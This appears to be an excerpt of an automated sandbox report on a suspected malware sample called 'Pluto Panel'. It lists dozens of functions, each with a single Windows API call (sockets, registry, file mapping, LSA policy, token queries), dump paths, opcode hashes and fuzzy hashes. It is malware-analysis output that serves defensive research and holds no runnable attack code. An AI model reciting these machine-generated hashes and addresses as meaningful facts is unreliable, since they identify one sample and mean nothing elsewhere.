                                                                                                          • String ID:
                                                                                                          • API String ID: 724789610-0
                                                                                                          • Opcode ID: 949215777cf923e7576f0359b113794831a3e882daaa81baf1466e07aa1e150e
                                                                                                          • Instruction ID: ce728fcec8bb84b134a0cc912b1000ae15a988293c7472c196721f15f31c895d
                                                                                                          • Opcode Fuzzy Hash: 949215777cf923e7576f0359b113794831a3e882daaa81baf1466e07aa1e150e
                                                                                                          • Instruction Fuzzy Hash: 6F31D37140E3C06FC7028B358C55B62BFB4EF47620F1985DBD9C48F1A3D229A919CBA2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 032313C1 Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 414 32313c1-323149f CreateFileMappingW
                                                                                                          APIs
                                                                                                          • CreateFileMappingW.KERNELBASE(?,00000E2C,?,?), ref: 0323146E
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFileMapping
                                                                                                          • String ID:
                                                                                                          • API String ID: 524692379-0
                                                                                                          • Opcode ID: e670fd2353430050fe7a00e665c2bf8cd9864f74b589db164d801fbb5a4fdc24
                                                                                                          • Instruction ID: 1b1fbffb7ed316b28c99d719840392f1f8a12fb646893386f12c56ea99761ab0
                                                                                                          • Opcode Fuzzy Hash: e670fd2353430050fe7a00e665c2bf8cd9864f74b589db164d801fbb5a4fdc24
                                                                                                          • Instruction Fuzzy Hash: 693181715093C15FD3138B35DC55B62BFB8EF47620F1A81DBD8848F553D264A909C7A2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230006 Relevance: 1.6, APIs: 1, Instructions: 79fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230091
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileRead
                                                                                                          • String ID:
                                                                                                          • API String ID: 2738559852-0
                                                                                                          • Opcode ID: e38beed86871228514cc7d5a42e05ad840c302df88306f0cda2b9280b2a30a00
                                                                                                          • Instruction ID: d89453de8d26e47114741a43f0f4737e282349b1447b7d5dc17f967313f91080
                                                                                                          • Opcode Fuzzy Hash: e38beed86871228514cc7d5a42e05ad840c302df88306f0cda2b9280b2a30a00
                                                                                                          • Instruction Fuzzy Hash: B2219272405340AFEB228F51DC40FA6BFBCEF46320F0984AAED459F152D269A949DB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167BD00 Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167BD95
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: 87a0af897a099451af6891b4b46d829dda8dfa4aa1a09e5f01f0b60b3779cce4
                                                                                                          • Instruction ID: 9fe2ff1c6c9e6a13a9c38a3708a46690c8b7b3319b03a838de992c5d2903ed96
                                                                                                          • Opcode Fuzzy Hash: 87a0af897a099451af6891b4b46d829dda8dfa4aa1a09e5f01f0b60b3779cce4
                                                                                                          • Instruction Fuzzy Hash: 0C2100764087806FE713CB15DC40BA2BFB8EF46720F1885DAED819F153D2586905C771
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B82E Relevance: 1.6, APIs: 1, Instructions: 77networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 0167B8BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Socket
                                                                                                          • String ID:
                                                                                                          • API String ID: 38366605-0
                                                                                                          • Opcode ID: 9c482e39cc3d9cce199f06d94b6dbac7347ea82c13a253a684ad527bf91ecbab
                                                                                                          • Instruction ID: ac7f0333cfe53ab3f22e1a1487eee1d1d8b66150ac8e207515c9fad373ed6076
                                                                                                          • Opcode Fuzzy Hash: 9c482e39cc3d9cce199f06d94b6dbac7347ea82c13a253a684ad527bf91ecbab
                                                                                                          • Instruction Fuzzy Hash: 2D218B71509780AFEB22CF65DC45F56FFB8EF09220F08859EE9859B252D375A408CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167BC2A Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0167BCA9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: b2c23cfafdbbdb612856bd5c0db204652040f3997501966390756280027dea4a
                                                                                                          • Instruction ID: cb7f60c6167e280dadf43a688bcce8d5ce443a48f3539a9aab11064d9883e96d
                                                                                                          • Opcode Fuzzy Hash: b2c23cfafdbbdb612856bd5c0db204652040f3997501966390756280027dea4a
                                                                                                          • Instruction Fuzzy Hash: D6218E71500640AFEB21DF65DD45B66FBE8EF04210F04856AED859B252D775E408CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0323024E Relevance: 1.6, APIs: 1, Instructions: 75registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032302E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: eacf92c09bcc8b94cfccb677e57a6b9e4523358b698181db2bd063e79972c317
                                                                                                          • Instruction ID: f1f67dd141921b806d309ef30b3838f8a6b3a4ec2d0613679d88317a693a60fc
                                                                                                          • Opcode Fuzzy Hash: eacf92c09bcc8b94cfccb677e57a6b9e4523358b698181db2bd063e79972c317
                                                                                                          • Instruction Fuzzy Hash: E2219DB2509341AFE721CF55CC44F57FBB8EF06220F08859AED859B252D268E548CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230F5D Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • getsockname.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230FE3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: getsockname
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358416759-0
                                                                                                          • Opcode ID: b4e21fa745bbafffe8de292d13286baf1985769a6f87f169741869e0041bdbaa
                                                                                                          • Instruction ID: bb91b72a533a3b0138eac1f8c56af9053fbd66584b8cdf34a7b51a6f52deecb6
                                                                                                          • Opcode Fuzzy Hash: b4e21fa745bbafffe8de292d13286baf1985769a6f87f169741869e0041bdbaa
                                                                                                          • Instruction Fuzzy Hash: 0F21B0B1509380AFE721CF61DC44F96FFBCEF46220F0884AAED859F152C268A548CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167AB56 Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0167ABD5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Open
                                                                                                          • String ID:
                                                                                                          • API String ID: 71445658-0
                                                                                                          • Opcode ID: 0ce62341729f17b6e0a170926de2d1e754f35f3384d7cd97c6aab563eeb6663d
                                                                                                          • Instruction ID: 3aca68609fa2120d3724623d5b0bde74f6b18d843b7afef105addde3699e671e
                                                                                                          • Opcode Fuzzy Hash: 0ce62341729f17b6e0a170926de2d1e754f35f3384d7cd97c6aab563eeb6663d
                                                                                                          • Instruction Fuzzy Hash: 8021A1B2500604AFE7219F65DC84FABFBECEF04610F08895AED419B251D338E5088AB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230986 Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateMutexW.KERNELBASE(?,?), ref: 032309F9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateMutex
                                                                                                          • String ID:
                                                                                                          • API String ID: 1964310414-0
                                                                                                          • Opcode ID: 215623296edcd9c21eb0a047d6672f05f3579186bc4b15681f03e2310619187b
                                                                                                          • Instruction ID: f68f65b2a32649164c2c14c6f34e65c6c5f87c9862cf9ba98fe6bf945e8b14ae
                                                                                                          • Opcode Fuzzy Hash: 215623296edcd9c21eb0a047d6672f05f3579186bc4b15681f03e2310619187b
                                                                                                          • Instruction Fuzzy Hash: 8121C2B16042419FF720DF65DC45B6AFBE8EF05610F08C4AAED499B242D374E448CB75
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B31E Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LsaOpenPolicy.ADVAPI32(?,00000E2C), ref: 0167B38F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: OpenPolicy
                                                                                                          • String ID:
                                                                                                          • API String ID: 2030686058-0
                                                                                                          • Opcode ID: c223db0bcddc390fdfcbdf467326ac650aad0bf467746b98626339ca22ee768a
                                                                                                          • Instruction ID: 3d35edc0c480f3b9ea5e6a8ef6737e3b79095ca23ef1ce20f0ef91b3f062d1b2
                                                                                                          • Opcode Fuzzy Hash: c223db0bcddc390fdfcbdf467326ac650aad0bf467746b98626339ca22ee768a
                                                                                                          • Instruction Fuzzy Hash: A4219072500204AFEB21DF65EC85F6AFBECEF04620F14896AED85DB241D274E5498F71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231041 Relevance: 1.6, APIs: 1, Instructions: 70COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • ioctlsocket.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032310BF
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ioctlsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 3577187118-0
                                                                                                          • Opcode ID: 34d08c912879a71794d50bb8f53e6bfd077b04e6a633b858d8f78ddbac146f96
                                                                                                          • Instruction ID: 0f7ad95da9947d5b05afe234a24db0161e2784668389617dfbae9689133f34d3
                                                                                                          • Opcode Fuzzy Hash: 34d08c912879a71794d50bb8f53e6bfd077b04e6a633b858d8f78ddbac146f96
                                                                                                          • Instruction Fuzzy Hash: D72184714093846FEB12CF55DC45F96FFB8EF46210F0884AAED859F152C268A558CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167AC5E Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167ACD8
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 9d142ee465ef6797379588fdd99ec5298005110168a6c9c2d932b8e1e2c8ae65
                                                                                                          • Instruction ID: f5ba74c2842ff4f679f0df0ca1397cc61d2ecd82f5e116b50d730701d1d347e0
                                                                                                          • Opcode Fuzzy Hash: 9d142ee465ef6797379588fdd99ec5298005110168a6c9c2d932b8e1e2c8ae65
                                                                                                          • Instruction Fuzzy Hash: CF219D76600204AFEB20CF65DC85F6BFBECEF04610F08856AED459B251D764E509CE71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B002 Relevance: 1.6, APIs: 1, Instructions: 69COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetTokenInformation.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 0167B06C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InformationToken
                                                                                                          • String ID:
                                                                                                          • API String ID: 4114910276-0
                                                                                                          • Opcode ID: 94a13a98f144b8ab20e5c5ca1129f2a33e1cc42729dbec1cf39b0d7289ceee61
                                                                                                          • Instruction ID: 8cbe64cba193d5df95d5b77a413a28c172e00bf086112a842b11bf128a2034a2
                                                                                                          • Opcode Fuzzy Hash: 94a13a98f144b8ab20e5c5ca1129f2a33e1cc42729dbec1cf39b0d7289ceee61
                                                                                                          • Instruction Fuzzy Hash: 43119072500205AFEB228F65DC85FABBBACEF04220F04846AED45DB251D678A549CFB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0323050A Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • OpenFileMappingW.KERNELBASE(?,?), ref: 03230575
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileMappingOpen
                                                                                                          • String ID:
                                                                                                          • API String ID: 1680863896-0
                                                                                                          • Opcode ID: f35f5d6c74352bc09691a973d1b551bd49b0316bfa1c39b6fc6a996726d0140e
                                                                                                          • Instruction ID: 3e2edc98227b0eb32bfab171cedd054243dabd7b60d66d582694ecf3a8d0e7e3
                                                                                                          • Opcode Fuzzy Hash: f35f5d6c74352bc09691a973d1b551bd49b0316bfa1c39b6fc6a996726d0140e
                                                                                                          • Instruction Fuzzy Hash: DC21DFB1901241AFEB20DF65DC85B6AFBE8EF05220F08C4AAED469F241D375E448CB75
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231142 Relevance: 1.6, APIs: 1, Instructions: 68networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: accept
                                                                                                          • String ID:
                                                                                                          • API String ID: 3005279540-0
                                                                                                          • Opcode ID: e40d28e790f06473487a4c357eac9a0828dcfb3bb2c1e3333fe8309d650e4a01
                                                                                                          • Instruction ID: 6a4a78ac4f8e9fb6f6289f22bdcc6ac8af583fa7627a6d18c6485ae1b1ff4730
                                                                                                          • Opcode Fuzzy Hash: e40d28e790f06473487a4c357eac9a0828dcfb3bb2c1e3333fe8309d650e4a01
                                                                                                          • Instruction Fuzzy Hash: 3B21FDB1500241AFEB20DF64DC85BAAFBE8EF05620F1884AAED849B241D375F448CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0323060A Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileView
                                                                                                          • String ID:
                                                                                                          • API String ID: 3314676101-0
                                                                                                          • Opcode ID: a9dd56160523d53cd48c2dc0a3f7ca7a7088ef864cce333b05b5ad72775881ed
                                                                                                          • Instruction ID: b4bdb86bd70592377af288a8ebfc18c12e2c64bc67a2402d47f29cf62663db8f
                                                                                                          • Opcode Fuzzy Hash: a9dd56160523d53cd48c2dc0a3f7ca7a7088ef864cce333b05b5ad72775881ed
                                                                                                          • Instruction Fuzzy Hash: D421DEB1500200AFEB21CF65DC84F5AFBE8EF08320F08845AED859B251D275A548CF71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167B84E Relevance: 1.6, APIs: 1, Instructions: 67networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSASocketW.WS2_32(?,?,?,?,?), ref: 0167B8BA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Socket
                                                                                                          • String ID:
                                                                                                          • API String ID: 38366605-0
                                                                                                          • Opcode ID: 6bd3ce53ee83dc778d9b8244e27430eb0c425175b2bae8649e7b6b33194e17d3
                                                                                                          • Instruction ID: 2621f1729eaea3b19c4effad14784f54dc57c8d94939a34e5493aeb808f35aed
                                                                                                          • Opcode Fuzzy Hash: 6bd3ce53ee83dc778d9b8244e27430eb0c425175b2bae8649e7b6b33194e17d3
                                                                                                          • Instruction Fuzzy Hash: 7F21C071504640AFEB21DF65DD45B6AFBE8EF08320F18846EEE859B252D375A408CF71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0323026E Relevance: 1.6, APIs: 1, Instructions: 65registryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • RegQueryValueExW.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032302E0
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: QueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3660427363-0
                                                                                                          • Opcode ID: 0c02b02d448f935b0455afc06b076202dbe1a51263355ca87eaf272af53d0aae
                                                                                                          • Instruction ID: 5053d4fa03f777442d3526c0afc79af9bd97bcdfadf887f6aaf3be8b74c83c8d
                                                                                                          • Opcode Fuzzy Hash: 0c02b02d448f935b0455afc06b076202dbe1a51263355ca87eaf272af53d0aae
                                                                                                          • Instruction Fuzzy Hash: 74117FB2504205AFEB20CE55DC45F67FBE8EF05610F08C56AED469B251D368E548CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231A6D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • LoadLibraryShim.MSCOREE(?,?,?,?), ref: 03231AE9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: LibraryLoadShim
                                                                                                          • String ID:
                                                                                                          • API String ID: 1475914169-0
                                                                                                          • Opcode ID: 5f7a694fb8dd7527729928483dbae7daee5ab962828dc31c4a9c83f167d16035
                                                                                                          • Instruction ID: f79389ad378e73a74e2573897562c310af03d264d94a1f4b26fd4a74b252fb57
                                                                                                          • Opcode Fuzzy Hash: 5f7a694fb8dd7527729928483dbae7daee5ab962828dc31c4a9c83f167d16035
                                                                                                          • Instruction Fuzzy Hash: 9F218EB1509384AFDB22CE15DC44B62FFF8EF46210F0980DAED848B252D265E818CB62
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230C56 Relevance: 1.6, APIs: 1, Instructions: 64timeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetProcessTimes.KERNELBASE(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230CB5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ProcessTimes
                                                                                                          • String ID:
                                                                                                          • API String ID: 1995159646-0
                                                                                                          • Opcode ID: 35edbfbea1ac1276f6c939f7b5f51b3cd1879633d23d1d3ce77068823f59761d
                                                                                                          • Instruction ID: c8326da3f2c85dfd92278615beda595f5113c1c89337b6a76c8573a0e75ab7e6
                                                                                                          • Opcode Fuzzy Hash: 35edbfbea1ac1276f6c939f7b5f51b3cd1879633d23d1d3ce77068823f59761d
                                                                                                          • Instruction Fuzzy Hash: 3611E6B2500201AFEB21CF65DC45F6AFBE8EF04320F08C86AED469B251C278A548DF71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03231246 Relevance: 1.6, APIs: 1, Instructions: 63networkCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • WSAEventSelect.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 032312AA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: EventSelect
                                                                                                          • String ID:
                                                                                                          • API String ID: 31538577-0
                                                                                                          • Opcode ID: a38c6fa68b594fcfd5cc0393d435b189bc6abb6f0e61763f3c8d80783879a0b7
                                                                                                          • Instruction ID: d234c06959799f96233d836ca43670f16fb6fda413b9379cc3e0a613a1ef9764
                                                                                                          • Opcode Fuzzy Hash: a38c6fa68b594fcfd5cc0393d435b189bc6abb6f0e61763f3c8d80783879a0b7
                                                                                                          • Instruction Fuzzy Hash: 8E11D3B2404205AFE710DF90DC44F9AFBACEF04220F18846AED45DB251D678A1488FB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 03230F82 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • getsockname.WS2_32(?,00000E2C,70573F6A,00000000,00000000,00000000,00000000), ref: 03230FE3
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.705579286.0000000003230000.00000040.00000800.00020000.00000000.sdmp, Offset: 03230000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_3230000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: getsockname
                                                                                                          • String ID:
                                                                                                          • API String ID: 3358416759-0
                                                                                                          • Opcode ID: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
                                                                                                          • Instruction ID: 7926d3547d8d9ee414bcba760ac104e06fa46e579112d4f4fdb4e5fba182aba8
                                                                                                          • Opcode Fuzzy Hash: 9530d8af3a82211d4b64243f9fdfeab6f7d87cf3d07c859eabebd67b41299385
                                                                                                          • Instruction Fuzzy Hash: 0F1190B1504201AFE720DF55DC85BAAFBACEF05220F08C4AAED459B251D678A5488A71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A65A Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0167A6CC
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: a0502b311a40918ced5298c0c28a5489821224fb2ec7f22a06c1236cf3285bb5
                                                                                                          • Instruction ID: eb80cc5126f57e42a06a17a85739dfa5c6831222e94783a1f83ca48d2d8ff9a2
                                                                                                          • Opcode Fuzzy Hash: a0502b311a40918ced5298c0c28a5489821224fb2ec7f22a06c1236cf3285bb5
                                                                                                          • Instruction Fuzzy Hash: F221366140E3C4AFDB138B259C54662BFB4EF47624F0980DBED858F2A3D2695908DB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0167A5AF Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0167A61A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.704122862.000000000167A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_167a000_Pluto Panel.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
